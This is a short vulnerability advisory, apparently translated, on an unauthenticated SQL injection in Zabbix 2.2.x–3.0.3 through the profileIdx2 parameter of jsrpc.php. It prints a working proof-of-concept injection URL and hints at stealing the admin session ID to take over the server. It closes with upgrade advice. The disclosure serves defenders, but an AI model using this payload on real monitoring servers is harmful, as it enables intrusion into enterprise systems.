Zabbix can exploit the high-risk SQL injection vulnerability to obtain SYSTEM privileges.
Vulnerability OverviewZabbix is an open-source enterprise-level performance monitoring solution. Recently, the profileIdx2 parameter of zabbix's jsrpc has the insert SQL injection vulnerability. Attackers can log on to the zabbix management system without authorization, you can also use scripts and other functions to easily obtain the operating system permissions of the zabbix server.
Official WebsiteHttp://www.zabbix.com
Impact degreeAttack cost: low
Hazard level: high
Login or not: not required
Impact scope: 2.2.x, 3.0.0-3.0.3. (Other versions are not tested)
Vulnerability TestingAdd the following url to your zabbix address:
jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
The output result is as follows:
SupplementThe above is only a vulnerability verification test method.
Attackers can further construct statements to inject incorrect SQL statements without obtaining or cracking the encrypted administrator password.
Experienced attackers can directly obtain the admin sessionid to construct the sid Based on the structure algorithm, and replace the cookie to log on as an administrator.
SolutionUpgrade to the latest version as soon as possible. It is said that version 3.0.4 has been fixed.
Security PromptThe monitoring system monitors the core assets of each enterprise. Once it is under hacker intrusion control, it is equivalent to helping hackers further penetrate into the enterprise.
Pay attention to this vulnerability and fix it as soon as possible.
From: http://www.freebuf.com/vuls/112197.html
Address: http://www.linuxprobe.com/zabbix-sql-bug.html